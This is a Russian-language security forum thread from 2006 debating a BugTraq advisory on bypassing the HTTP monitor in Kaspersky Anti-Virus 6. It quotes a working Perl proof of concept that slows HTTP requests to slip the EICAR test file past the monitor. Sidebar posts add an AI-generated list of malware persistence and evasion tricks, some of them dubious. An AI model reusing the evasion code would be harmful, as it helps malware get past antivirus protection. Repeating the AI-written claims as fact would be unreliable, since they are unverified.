Kaspersky antivirus 6: HTTP monitor bypassing - Выбор домашних средств защиты - Форумы Anti-Malware.ru Перейти к содержанию
nobody@nowhere

Kaspersky antivirus 6: HTTP monitor bypassing

Recommended Posts

nobody@nowhere

http://www.securityfocus.com/archive/1/434827 :

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Блин, не успели зарелизить, уже уязвимость нашли ...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
Блин, не успели зарелизить, уже уязвимость нашли ...

Интересно посмотреть, насколько быстро запатчат... Надеюсь, что запатчат.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Linux популярнее © ROC FAQ

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

ну можно вспомнить певицу Мадонну, она то точно популярнее и известнее Линукса..

А можно блендер с мотоциклом сравнивать..и там и там мотор есть.

Добавлено спустя 7 минут 54 секунды:

вдруг кто не сходит ссылке не почитает..

BugTraq

Back to list | Post reply

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

john kak-sam to

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:

There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;

use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

PeerPort => $h_port,

Proto => 'tcp' );

die "socket: $!" unless $s;

sendthem( $s,

"GET $h_url HTTP/1.1",

"Host: $h_srv",

""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."n";

sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "r" );

sendone( $s, "n" );

}

}

sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working ;)

select( undef, undef, undef, 0.300 );

}

sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "rn";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:s+(d+)/;

}

$cl;

}

sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "n";

next if $v eq "r";

$str .= $v;

}

return $str;

}

sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body <content-length: $cli> ...n";

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}

Добавлено спустя 1 минуту 18 секунд:

Кстати, это ещё не уязвимость и даже не кандидат в уязвимости.. Просто сообщение некого

john kak-sam to

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TiX

Этот некто создал этот топик Ж) Война прожолжается...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

ну и тест, теста (vir2.gif)

пусть все остальные мониторы выключены (vir3.gif)

А вот с ssl не так всё просто :(

vir.gif

vir2.gif

vir3.gif

post-36-1148455993.gif

post-1-1148455993.gif

post-1-1148455994.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

тест чего и на что?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets

Ответ разработчика ЛК читайте здесь: http://forum.kaspersky.com/index.php?showt...st&p=120245.

А вот с ssl не так всё просто

Проверка ссл-трафика веб-антивирусом появится в MP1 (уже добавлена в бетах).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

а. осталось троянописателей убедить запускать IE для качанья, они люди злобные и подстраиваться так что бы KAV им не давал качать не будут. ;) было бы не смешно, а просто печально если бы под IE оно тоже пропускало вирусы.

Добавлено спустя 6 минут 48 секунд:

Блин, не успели зарелизить, уже уязвимость нашли ...

читайте интерью Данилова - "поделия ученика 11 класса", ну и все отсюда вытекающее.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

vir4.gif

post-36-1148459453.gif

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

линк на что?

проходят. но монитор их не видит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

Сергей Ильин

дыра ли это..и вообще.. подождём что напишут на www.securityfocus.com

Господин утверждает, что веб-антивирус в принципе не работает.

линк на что?
интерью Данилова - "поделия ученика 11 класса

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nobody@nowhere
На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

нет. дырки в IE эксплуатируются в полный рост. в iframe, рендеринг картинок - впомните как специальные bmp роняли всю винду. да и просто вредоносный javascript. браузер ничего из этого на диск записывать не будет, он мило отработает. даже если запись в кэш будет остановлена - поздно уже.

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

каков уровень авторов и их знания технологии таков и результат

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker
javascript

с файловой системой напрямую не работает.

Добавлено спустя 8 минут 38 секунд:

есть одно замечаение, www.securityfocus.com принадлежит конкуренту каспера - семантику. Мне кажется, если, указанная выше, уязвимость была очень серьёзной, то семантик бы первый крикнул.. типа ВОТ ВАМ..

хотя с другой стороны, кто его знает.. что там в голове у семантика :))))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets

Я запустил зловещий скрипт, долго смотрел на приведённый ниже алерт, задавая себе вопрос "А где прикол?"... И потом до меня вдруг дошло! Ну конечно же! john, я наконец-то всё понял! Ведь это же алерт Анти-Хакера! То есть фаервола! То есть такой штуки, которой в Dr.Web, как бы это сказать, нету... Именно поэтому вы не учли, что такой алерт появится, если вы вместо стандартного браузера или даунлоадера (для защиты которых создан компонент Web-Antivirus в КИС 6) используете ваш самописный скрипт, запущенный на компе клиента. Что ж, не страшно, с кем не бывает...

Вот на всякий случай, может понадобится кому...=) http://exler.ru/expromt/12-01-2005.htm

ah1.JPG

post-198-1148463281.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
дайте линк, может что-то проясниться.

Прояснится только то, что в моём длинном посте про Dr.Web больше правды, чем кажется на первый взгляд =) Держите линк: http://inesp.ru/download/Interview.rar

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

Сергей Ильин

это извращённый реверсивный троян. Как я уже не раз писал, в скрипте нет особой уязвимости и тем более угрозы.

ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

НЕЛЬЗЯ.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Угу, я вам больше скажу. Я подозреваю, что и в КАВ без антихакера эту уязвимость нельзя будет использовать, ибо сработает файловый монитор, когда eicar будет закачан на комп. Давайте так... Чтобы не быть голословным, я вечером это проверю и выложу скриншоты (в том числе и на форуме ЛК, чтобы народ зря не пугался). Просто в универе я это проверить не могу, так как даже если я жму "Разрешить" в антихакере, eicar блокируется внешним фаерволлом универа =(

Ну а пока я проверяю, пусть нам john кинет линк на инет-магазин, где можно купить веб-антивирус производства Dr.Web, который конечно же будет нас защищать от этого зловреда...=)))))) Ведь раз 11-классники уже написали свой Веб-АВ, то у НАСТОЯЩИХ СПЕЦИАЛИСТОВ непременно найдётся гораздо более надёжная защита, правда?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • demkd
      ИИ — полезная штука, но, к сожалению, бесплатные версии, как тот же Google Gemini Flash, тупенькие на уровне 12b моделей, делают колоссальное число ошибок по мелочам. Яблочко от яблони... Мало того, "новое" у них обычно старое с отставанием на год, и это в лучшем случае. Я сейчас как раз занимаюсь новой, уже 3-й версией своего "Клавиатурного помощника". В нём будет поддержка локального ИИ, горячих ИИ-клавиш, голосовых команд, голосового ввода и вспомогательной LLM для переводов, правки текста и т.п. Именно локального ИИ без необходимости обращения в сеть и сопутствующих утечек данных И это не для старого железа — нужно как минимум много памяти и современный процессор, в идеале хотя бы RTX 5060 Ti 16 ГБ в качестве ускорителя. А результат, ну, такой себе. ИИ слишком склонен ошибаться, и доверять ему что-то серьёзное пока не стоит, даже код пишет, который как-то работает, но в нём масса мелких и незаметных ошибок и уязвимостей. 
      Текст исправлен с помощью Google Gemma 4 E4B. 
    • PR55.RP55
      Вы сказали: "Найди все новые ключи которые появились 2026 г. и ранее не использовались... Можешь ?"
      *Да, я могу помочь* составить список новых ключей реестра и путей
      автозагрузки, которые вредоносное ПО использует в текущих кампаниях
      (включая модификации 2026 года), маскируясь под легальные системные
      компоненты. ( скопирую частично) :   * *|HKLM\SOFTWARE\Classes\Protocols\Filter|* и *|\Handler|* — новые
          модификации Adware перехватывают протоколы edge:// или msproedg://
          для подмены поисковой выдачи.   * *|HKCU\Software\Microsoft\Windows\CurrentVersion\Lxss|* —
          использование подсистемы WSL для скрытого автозапуска
          Linux-ориентированных рекламных модулей, незаметных для стандартных
          триггеров автозагрузки Windows. Современные зловреды (особенно Adware и майнеры) научились прописываться
      в тихий автозапуск без создания классических ключей |Run| или
      |Services|. Они используют встроенный механизм Windows 10/11 —
      *псевдонимы выполнения приложений*.   * *Суть*: В реестре создается связь в ветке
          |HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths| или через
          механизм |AppXPackage|. Зловред подменяет вызов легальной команды
          (например, при наборе пользователем |notepad| или |calc| в строке
          «Выполнить») и запускает свое тело.
        * *Что добавить в памятку*: Обращать внимание на появление кастомных
          записей в блоке «Псевдонимы приложений» и проверять, куда
          перенаправляются стандартные системные вызовы. 2. Подмена через каталоги |Lxss| (WSL — Windows Subsystem for Linux)
      Это одна из самых опасных современных тенденций, так как многие
      антивирусы до сих пор слабо сканируют Linux-среду внутри Windows.   * *Суть*: Майнеры и стилеры прописывают свой запуск внутри
          дистрибутива WSL (ключ реестра
          |HKCU\Software\Microsoft\Windows\CurrentVersion\Lxss|). При старте
          Windows запускается скрытая фоновая сессия WSL, которая активирует
          ELF-бинарник (Linux-вирус). В логах автозапуска Windows это выглядит
          как легальный старт службы |wsl.exe|, но с хитрыми аргументами.
        * *Что добавить в памятку*: Формула «А+В+С»: если |wsl.exe|
          запускается автоматически с флагами |-d| (конкретный дистрибутив)
          или скрытыми bash-скриптами — это 100% повод для изоляции и проверки
          содержимого виртуального диска VHDX. 3. Продвинутый Timestomping с подделкой под апдейты ОС
      Раньше вирусописатели просто копировали даты у соседних файлов
      (|kernel32.dll| и т.д.). Теперь они действуют умнее:   * *Суть*: Дата создания файла выставляется ровно на день/час крупного
          официального обновления Windows (например, подстраиваются под график
          Patch Tuesday от Microsoft). Аналитик смотрит на лог uVS, видит дату
          (например, |14.10.2025|) и думает: «А, ну это тогда накопительный
          апдейт прилетел, файл чистый».
        * *Что добавить в памятку*: Правило проверки контрольных сумм. Не
          верить датам, даже если они идеально совпадают со временем
          системного обновления. Если у файла из папки |System32| с
          «правильной» датой обновления отсутствует валидная ЭЦП (или статус
          |Цифр. подпись: НЕТ|) — это критический триггер. 4. Атаки типа Living off the Land (LotL) через новые системные утилиты
      Вместо использования заезженных |powershell.exe| или |cmd.exe|, которые
      сейчас жестко блокируются любым EDR/антивирусом, малварь перешла на
      легальные, но редкие утилиты Windows (LOLBins).   * *Суть*: Для скачивания и запуска вредоносного кода используются
          системные компоненты:
            o |curl.exe| (теперь встроен в Windows) — для скрытой загрузки
              полезной нагрузки.
            o |tar.exe| — для распаковки зашифрованных архивов со стилерами
              прямо «на лету».
            o |winget.exe| (Windows Package Manager) — для скачивания
              вредоносных утилит из легальных репозиториев.
        * *Что добавить в памятку*: В uVS нужно тщательно анализировать
          параметры запуска командной строки в Планировщике задач (|TASKS|),
          если там фигурируют |curl|, |tar| или |bitsadmin|, качающие что-то с
          внешних IP-адресов. 6. Скрытые модификации через COM-объекты (COM Hijacking без изменения
      файлов)
      Вместо перезаписи файлов в |System32| или создания явных ключей |Run|,
      малварь перехватывает легальные системные интерфейсы через реестр.   * *Суть*: Зловред прописывает путь к своей вредоносной DLL в ветку
          *|HKCU\Software\Classes\CLSID\{GUID}\InprocServer32|*. При этом
          берется GUID легального и часто используемого компонента Windows
          (например, Проводника, контекстного меню или планировщика). Как
          только система или пользователь совершает обычное действие
          (открывает папку, кликает правой кнопкой мыши), Windows
          автоматически подгружает вредоносную DLL.
        * *Что добавить в памятку*: В uVS такие объекты часто попадают в
          категорию «Подозрительные CLSID» или скрытые расширения оболочки.
          Если в ветке |HKCU| (пользовательский уровень) переопределяется
          системный GUID, который по умолчанию должен жить только в |HKLM|
          (уровень системы) — это явный признак перехвата. 7. Спуфинг цифровой подписи через уязвимости каталогов (Catalog Signing
      Spoofing)
      Малварь научилась обходить базовую проверку подписей, из-за чего в логах
      некоторых утилит файл может ошибочно помечаться как «Подписан Microsoft».   * *Суть*: Используются уязвимости в механизме проверки файлов через
          каталоги безопасности Windows (|.cat| файлы). Вредоносный бинарник
          модифицируется таким образом, что его хэш совпадает с хэшем
          легального файла в базе данных каталогов (используются коллизии или
          специфические уязвимости парсинга).
        * *Что добавить в памятку*: Правило двойной проверки. Если файл
          находится в нетипичном месте (например,
          |C:\Users\...\Temp\svchost.exe|), но uVS или ОС рапортует, что у
          него «Валидная подпись Microsoft» — необходимо принудительно
          отправлять хэш файла на VirusTotal через встроенную функцию uVS или
          проверять подпись сторонними утилитами (например, |Sigcheck| от
          Sysinternals) с проверкой отзывов сертификатов. 8. Эксплуатация механизма «Служб доставки обновлений» браузеров
      (Edge/Chrome Maintenance)
      Рекламное ПО (Adware) и кликеры ушли от создания собственных явных служб
      и теперь паразитируют на легальных планировщиках браузеров.   * *Суть*: Вредоносный скрипт не создает новую задачу в Планировщике.
          Вместо этого он модифицирует параметры /уже существующей/ легальной
          задачи, например, |MicrosoftEdgeUpdateTaskMachineCore|. В
          оригинальную команду дописывается скрытый аргумент
          (аргумент-паразит), который раз в сутки скачивает или запускает
          рекламный модуль. Аналитик видит знакомое имя задачи Edge, видит
          легальный путь к апдейтеру и пропускает её.
        * *Что добавить в памятку*: При анализе задач Планировщика (|TASKS|) в
          uVS нужно смотреть не только на имя файла, но и *полностью
          разворачивать строку аргументов*. Любые добавленные URL-адреса,
          вызовы |cmd /c|, или сторонние пути в параметрах легальных служб
          обновления — это стопроцентный признак компрометации. 10. Фейковые системные переменные в путях автозапуска
      Обман визуального восприятия аналитика через манипуляцию переменными среды.   * *Суть*: В реестре или планировщике путь к файлу прописывается как
          |%SystemRoot%\System32\drivers\malware.sys|. Но перед этим на уровне
          пользователя (|HKCU\Environment|) создается кастомная переменная
          |%SystemRoot%|, которая указывает вовсе не на |C:\Windows|, а на
          |C:\Users\Public\Documents|. В итоге аналитик глазами видит
          «безопасный» системный путь, а система при загрузке идет в скрытую
          пользовательскую папку.
        * *Что добавить в памятку*: Всегда проверять блок «Переменные
          окружения» в начале лога uVS. Любые попытки переопределить
          стандартные переменные вроде |%SystemRoot%|, |%WinDir%| или
          |%ProgramFiles%| на уровне текущего пользователя — это критическая
          угроза.
    • PR55.RP55
      Сейчас дал ИИ задание напиши скрипт и... Вот:  ( взял Инфо. из одного из старых образов) Скрипт лечения для uVS Чтобы полностью удалить эту службу, связанные с ней файлы и очистить ссылки в реестре, выполните следующий скрипт: text ; uVS v4.15.1 [Script] ; Target OS: Windows ; Удаление вредоносной службы и основного файла апдейтера delref %Network%\C:\PROGRAM FILES (X86)\YONTOO\Y2DESKTOP.UPDATER.EXE ; Удаление исполняемого файла в AppData, вызываемого через параметры службы delref %AppData%\YONTOO\YONTOODESKTOP.EXE ; Принудительное удаление самой службы из реестра delsrv Yontoo Desktop Updater ; Очистка остаточных путей и каталогов Yontoo deldir C:\Program Files (x86)\Yontoo deldir C:\Users\cappu44ino\AppData\Roaming\Yontoo ; Перезагрузка для применения изменений restart --------- Я сильно не увлекался - так для примера.  
    • PR55.RP55
      santy Модели ИИ ( я делал запрос к google ) - есть возможность задать вопрос ( дать задание ) по заранее выбранным настройкам: настройки: yaml [SYSTEM_OVERRIDE] ---------- Код он сам себе напишет :)  Главное задать нужные вопросы и потом попросить\ сохранить настройки в виде кода ) Единственно - не все ИХ модели нормально работают. Результаты тоже нужно проверять... Например:  получить Резюме... По записи - ( как в моём примере в Новые функции ) С заранее заданными параметрами - что нам нужно.  Это и для обучения и для экономии времени и когда оператор устал, для написания отчёта - по работе на семинар, при обсуждении на форуме, анализ новых угроз или появился новый ключ автозапуска; там где есть сомнение - что это... Построить цепочку - чтобы увидеть механику процесса\заражения. Увидеть аномалии - как то, что браузер "подписан" но это ЭЦП не головного офиса - а ЭЦП - пусть и "легитимное" - но смежников.  Аномалии пути; размера; схожесть имени и т.д. Никакие настройки uVS этого не дадут.  Можно увидеть никогда ранее неиспользуемый ключ запуска ( или его нестандартное применение ).  Если железо современное - то возможно? - локальные модели ИИ. Можно попробовать например дать задание: Найди все новые ключи которые появились 2026 г. и ранее не использовались...  
    • santy
      Как гипотетические варианты действий: ---------------------- - получить детальную расшифровку выбранного антивирусного детекта по результату проверки файла на VT из экрана ИНФО. Здесь я бы обратил внимание на три основных детекта: у Kaspersky, DrWeb, ESET, возможно + Microsoft. - получить расшифровку по цифровой подписи файла, насколько известна, и надежна. -  может стоит продумать свою классификацию детектов, и потом уже на основании данной классификации находить другие примеры/способы запуска и т.п.
×